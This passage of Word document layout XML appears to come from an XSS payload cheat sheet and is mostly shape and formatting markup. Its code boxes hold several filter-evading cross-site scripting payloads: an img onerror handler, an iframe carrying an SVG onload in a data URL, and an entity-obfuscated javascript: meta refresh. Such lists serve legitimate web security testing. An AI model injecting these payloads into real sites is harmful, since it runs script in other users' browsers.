                            <a:gd name="T18" fmla="+- 0 2681 2660"/>
                            <a:gd name="T19" fmla="*/ 2681 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 2660 2660"/>
                            <a:gd name="T23" fmla="*/ 2660 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 2660 2660"/>
                            <a:gd name="T27" fmla="*/ 2660 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 2684 2660"/>
                            <a:gd name="T31" fmla="*/ 2684 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 2687 2660"/>
                            <a:gd name="T35" fmla="*/ 2687 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 2709 2660"/>
                            <a:gd name="T39" fmla="*/ 270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E40B4" id="Freeform 123" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:133pt;width:2.45pt;height:2.45pt;z-index:-15475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" path="m28,49r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1720215;13335,1720215;11430,1719580;0,1706245;0,1702435;13335,1689100;17780,1689100;31115,1704340;31115,1706245;17780,172021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4179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1642745</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3094355" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="119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94355" cy="116205"/>
                          <a:chOff x="1930" y="2587"/>
                          <a:chExt cx="4873" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="120" name="Freeform 122"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="2587"/>
                            <a:ext cx="4873" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6781 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 4873"/>
                              <a:gd name="T2" fmla="+- 0 2769 2587"/>
                              <a:gd name="T3" fmla="*/ 2769 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 4873"/>
                              <a:gd name="T6" fmla="+- 0 2769 2587"/>
                              <a:gd name="T7" fmla="*/ 2769 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 4873"/>
                              <a:gd name="T10" fmla="+- 0 2769 2587"/>
                              <a:gd name="T11" fmla="*/ 2769 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 4873"/>
                              <a:gd name="T14" fmla="+- 0 2748 2587"/>
                              <a:gd name="T15" fmla="*/ 2748 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 4873"/>
                              <a:gd name="T18" fmla="+- 0 2745 2587"/>
                              <a:gd name="T19" fmla="*/ 2745 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 4873"/>
                              <a:gd name="T22" fmla="+- 0 2608 2587"/>
                              <a:gd name="T23" fmla="*/ 2608 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 4873"/>
                              <a:gd name="T26" fmla="+- 0 2587 2587"/>
                              <a:gd name="T27" fmla="*/ 2587 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6781 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 4873"/>
                              <a:gd name="T30" fmla="+- 0 2587 2587"/>
                              <a:gd name="T31" fmla="*/ 2587 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6802 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 4873"/>
                              <a:gd name="T34" fmla="+- 0 2608 2587"/>
                              <a:gd name="T35" fmla="*/ 2608 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6802 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 4873"/>
                              <a:gd name="T38" fmla="+- 0 2748 2587"/>
                              <a:gd name="T39" fmla="*/ 2748 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6784 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 4873"/>
                              <a:gd name="T42" fmla="+- 0 2769 2587"/>
                              <a:gd name="T43" fmla="*/ 2769 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6781 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 4873"/>
                              <a:gd name="T46" fmla="+- 0 2769 2587"/>
                              <a:gd name="T47" fmla="*/ 276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873" h="183">
                                <a:moveTo>
                                  <a:pt x="485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851" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4872" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4872" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4854" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485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2587"/>
                            <a:ext cx="487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7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src="x:gif"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67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onerror="window['al\u0065rt'](0)"&gt;&lt;/img&gt;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0" o:spid="_x0000_s2214" style="position:absolute;margin-left:96.5pt;margin-top:129.35pt;width:243.65pt;height:9.15pt;z-index:-15474688;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,2587" coordsize="4873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">
                <v:shape id="Freeform 122" o:spid="_x0000_s2215" style="position:absolute;left:1930;top:2587;width:4873;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4873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5O6scA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT0vDQBDF74LfYRnBS7EbKxSJ3RYb/NOTYFs8j9lp&#10;kpqdDbtrkvbTdw6Ctxnem/d+s1iNrlU9hdh4NnA/zUARl942XBnY717vHkHFhGyx9UwGThRhtby+&#10;WmBu/cCf1G9TpSSEY44G6pS6XOtY1uQwTn1HLNrBB4dJ1lBpG3CQcNfqWZbNtcOGpaHGjoqayp/t&#10;rzPwMRTvk2Lehcn5+6Vfu6/18eFtNOb2Znx+ApVoTP/mv+uNFfyZ4MszMoFeX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eTurHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m4851,182l21,182r-3,l,161r,-3l,21,21,,4851,r21,21l4872,161r-18,21l4851,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4851,2769;21,2769;18,2769;0,2748;0,2745;0,2608;21,2587;4851,2587;4872,2608;4872,2748;4854,2769;4851,2769" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 121" o:spid="_x0000_s2216" type="#_x0000_t202" style="position:absolute;left:1930;top:2587;width:4873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oFM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mTM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nqBTBAAAA3A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67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src="x:gif"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="67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onerror="window['al\u0065rt'](0)"&gt;&lt;/img&gt;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4230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1912620</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="118" name="Freeform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3061 3012"/>
                            <a:gd name="T3" fmla="*/ 3061 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 3061 3012"/>
                            <a:gd name="T7" fmla="*/ 3061 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 3060 3012"/>
                            <a:gd name="T11" fmla="*/ 3060 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 3040 3012"/>
                            <a:gd name="T15" fmla="*/ 3040 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 3033 3012"/>
                            <a:gd name="T19" fmla="*/ 3033 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 3012 3012"/>
                            <a:gd name="T23" fmla="*/ 3012 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 3012 3012"/>
                            <a:gd name="T27" fmla="*/ 3012 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 3037 3012"/>
                            <a:gd name="T31" fmla="*/ 3037 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 3040 3012"/>
                            <a:gd name="T35" fmla="*/ 3040 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 3061 3012"/>
                            <a:gd name="T39" fmla="*/ 306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5ABAA" id="Freeform 119" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:150.6pt;width:2.45pt;height:2.45pt;z-index:-15474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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1943735;13335,1943735;11430,1943100;0,1930400;0,1925955;13335,1912620;17780,1912620;31115,1928495;31115,1930400;17780,194373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4281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1866265</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2769870" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="115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9870" cy="116205"/>
                          <a:chOff x="1930" y="2939"/>
                          <a:chExt cx="4362" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="116" name="Freeform 118"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="2939"/>
                            <a:ext cx="4362" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6271 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 4362"/>
                              <a:gd name="T2" fmla="+- 0 3122 2939"/>
                              <a:gd name="T3" fmla="*/ 3122 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 4362"/>
                              <a:gd name="T6" fmla="+- 0 3122 2939"/>
                              <a:gd name="T7" fmla="*/ 3122 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 4362"/>
                              <a:gd name="T10" fmla="+- 0 3121 2939"/>
                              <a:gd name="T11" fmla="*/ 3121 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 4362"/>
                              <a:gd name="T14" fmla="+- 0 3101 2939"/>
                              <a:gd name="T15" fmla="*/ 3101 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 4362"/>
                              <a:gd name="T18" fmla="+- 0 3097 2939"/>
                              <a:gd name="T19" fmla="*/ 3097 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 4362"/>
                              <a:gd name="T22" fmla="+- 0 2960 2939"/>
                              <a:gd name="T23" fmla="*/ 2960 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 4362"/>
                              <a:gd name="T26" fmla="+- 0 2939 2939"/>
                              <a:gd name="T27" fmla="*/ 2939 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6271 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 4362"/>
                              <a:gd name="T30" fmla="+- 0 2939 2939"/>
                              <a:gd name="T31" fmla="*/ 2939 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6292 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 4362"/>
                              <a:gd name="T34" fmla="+- 0 2960 2939"/>
                              <a:gd name="T35" fmla="*/ 2960 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6292 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 4362"/>
                              <a:gd name="T38" fmla="+- 0 3101 2939"/>
                              <a:gd name="T39" fmla="*/ 3101 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6274 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 4362"/>
                              <a:gd name="T42" fmla="+- 0 3121 2939"/>
                              <a:gd name="T43" fmla="*/ 3121 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6271 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 4362"/>
                              <a:gd name="T46" fmla="+- 0 3122 2939"/>
                              <a:gd name="T47" fmla="*/ 312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362" h="183">
                                <a:moveTo>
                                  <a:pt x="4341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341" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4362" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4362" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4344" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="434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2939"/>
                            <a:ext cx="436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&lt;iframe/src="data:text/html,&lt;svg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onload=alert(1)&gt;"&gt;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" o:spid="_x0000_s2217" style="position:absolute;margin-left:96.5pt;margin-top:146.95pt;width:218.1pt;height:9.15pt;z-index:-15473664;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,2939" coordsize="436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">
                <v:shape id="Freeform 118" o:spid="_x0000_s2218" style="position:absolute;left:1930;top:2939;width:4362;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="436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fCEcMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2rDMBDdF3IHMYFuSiKn4FBcK6HELXjRLOzmAIM1&#10;tU2tkSMpjnv7qhDIbh7vO/l+NoOYyPnesoLNOgFB3Fjdc6vg9PWxegHhA7LGwTIp+CUP+93iIcdM&#10;2ytXNNWhFTGEfYYKuhDGTErfdGTQr+1IHLlv6wyGCF0rtcNrDDeDfE6SrTTYc2zocKRDR81PfTEK&#10;cPos0+OhOAdnfPX0fixSWxVKPS7nt1cQgeZwF9/cpY7zN1v4fyZe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fCEcMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m4341,183l21,183r-3,-1l,162r,-4l,21,21,,4341,r21,21l4362,162r-18,20l4341,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4341,3122;21,3122;18,3121;0,3101;0,3097;0,2960;21,2939;4341,2939;4362,2960;4362,3101;4344,3121;4341,3122" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 117" o:spid="_x0000_s2219" type="#_x0000_t202" style="position:absolute;left:1930;top:2939;width:436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5fRs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P13A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5fRs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&lt;iframe/src="data:text/html,&lt;svg</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing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onload=alert(1)&gt;"&gt;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4332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2128520</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="114" name="Freeform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3401 3352"/>
                            <a:gd name="T3" fmla="*/ 3401 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 3401 3352"/>
                            <a:gd name="T7" fmla="*/ 3401 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 3400 3352"/>
                            <a:gd name="T11" fmla="*/ 3400 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 3380 3352"/>
                            <a:gd name="T15" fmla="*/ 3380 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 3374 3352"/>
                            <a:gd name="T19" fmla="*/ 3374 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 3352 3352"/>
                            <a:gd name="T23" fmla="*/ 3352 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 3352 3352"/>
                            <a:gd name="T27" fmla="*/ 3352 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 3377 3352"/>
                            <a:gd name="T31" fmla="*/ 3377 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 3380 3352"/>
                            <a:gd name="T35" fmla="*/ 3380 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 3401 3352"/>
                            <a:gd name="T39" fmla="*/ 340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2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38977" id="Freeform 115" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:167.6pt;width:2.45pt;height:2.45pt;z-index:-15473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" path="m28,49r-7,l18,48,,28,,22,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,2159635;13335,2159635;11430,2159000;0,2146300;0,2142490;13335,2128520;17780,2128520;31115,2144395;31115,2146300;17780,215963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4384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2082800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4752975" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="111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116205"/>
                          <a:chOff x="1930" y="3280"/>
                          <a:chExt cx="7485" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="112" name="Freeform 114"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="3279"/>
                            <a:ext cx="7485" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 9394 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 7485"/>
                              <a:gd name="T2" fmla="+- 0 3462 3280"/>
                              <a:gd name="T3" fmla="*/ 3462 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 7485"/>
                              <a:gd name="T6" fmla="+- 0 3462 3280"/>
                              <a:gd name="T7" fmla="*/ 3462 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 7485"/>
                              <a:gd name="T10" fmla="+- 0 3461 3280"/>
                              <a:gd name="T11" fmla="*/ 3461 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 7485"/>
                              <a:gd name="T14" fmla="+- 0 3441 3280"/>
                              <a:gd name="T15" fmla="*/ 3441 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 7485"/>
                              <a:gd name="T18" fmla="+- 0 3438 3280"/>
                              <a:gd name="T19" fmla="*/ 3438 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 7485"/>
                              <a:gd name="T22" fmla="+- 0 3301 3280"/>
                              <a:gd name="T23" fmla="*/ 3301 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 7485"/>
                              <a:gd name="T26" fmla="+- 0 3280 3280"/>
                              <a:gd name="T27" fmla="*/ 3280 h 183"/>
                              <a:gd name="T28" fmla="+- 0 9394 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 7485"/>
                              <a:gd name="T30" fmla="+- 0 3280 3280"/>
                              <a:gd name="T31" fmla="*/ 3280 h 183"/>
                              <a:gd name="T32" fmla="+- 0 9415 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 7485"/>
                              <a:gd name="T34" fmla="+- 0 3301 3280"/>
                              <a:gd name="T35" fmla="*/ 3301 h 183"/>
                              <a:gd name="T36" fmla="+- 0 9415 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 7485"/>
                              <a:gd name="T38" fmla="+- 0 3441 3280"/>
                              <a:gd name="T39" fmla="*/ 3441 h 183"/>
                              <a:gd name="T40" fmla="+- 0 9397 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 7485"/>
                              <a:gd name="T42" fmla="+- 0 3461 3280"/>
                              <a:gd name="T43" fmla="*/ 3461 h 183"/>
                              <a:gd name="T44" fmla="+- 0 9394 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 7485"/>
                              <a:gd name="T46" fmla="+- 0 3462 3280"/>
                              <a:gd name="T47" fmla="*/ 346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85" h="183">
                                <a:moveTo>
                                  <a:pt x="746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464" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7485" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7485" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7467" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="746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279"/>
                            <a:ext cx="748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&lt;meta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content="&amp;NewLine;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&amp;NewLine;;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JAVASCRIPT&amp;colon;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alert(1)"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http-equiv="refresh"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/&gt;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" o:spid="_x0000_s2220" style="position:absolute;margin-left:96.5pt;margin-top:164pt;width:374.25pt;height:9.15pt;z-index:-15472640;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,3280" coordsize="7485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">
                <v:shape id="Freeform 114" o:spid="_x0000_s2221" style="position:absolute;left:1930;top:3279;width:7485;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="7485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VS/MQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPywi91U2k1ZpmI2Ip9eDFR4vHITvJ&#10;BrOzIbvV9N+7QqG3+fieky8H24oL9b5xrCCdJCCIS6cbrhUcDx9PryB8QNbYOiYFv+RhWYwecsy0&#10;u/KOLvtQixjCPkMFJoQuk9KXhiz6ieuII1e53mKIsK+l7vEaw20rp0kykxYbjg0GO1obKs/7H6vg&#10;VNH3fF1+vixS874dsDotvp43Sj2Oh9UbiEBD+Bf/uTc6zk+ncH8mXi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lUvzEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m7464,182l21,182r-3,-1l,161r,-3l,21,21,,7464,r21,21l7485,161r-18,20l7464,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="7464,3462;21,3462;18,3461;0,3441;0,3438;0,3301;21,3280;7464,3280;7485,3301;7485,3441;7467,3461;7464,3462" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 113" o:spid="_x0000_s2222" type="#_x0000_t202" style="position:absolute;left:1930;top:3279;width:7485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ZRcMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflil4azYqSJ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VZRcMAAADc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&lt;meta</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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content="&amp;NewLine;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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&amp;NewLine;;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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JAVASCRIPT&amp;colon;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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alert(1)"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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http-equiv="refresh"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/&gt;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4435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2352675</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="110" name="Freeform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3753 3705"/>
                            <a:gd name="T3" fmla="*/ 3753 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 3753 3705"/>
                            <a:gd name="T7" fmla="*/ 3753 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 3753 3705"/>
                            <a:gd name="T11" fmla="*/ 3753 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 3732 3705"/>
                            <a:gd name="T15" fmla="*/ 3732 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 3726 3705"/>
                            <a:gd name="T19" fmla="*/ 3726 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 3705 3705"/>
                            <a:gd name="T23" fmla="*/ 3705 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 3705 3705"/>
                            <a:gd name="T27" fmla="*/ 3705 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 3729 3705"/>
                            <a:gd name="T31" fmla="*/ 3729 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 3732 3705"/>
                            <a:gd name="T35" fmla="*/ 3732 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 3753 3705"/>
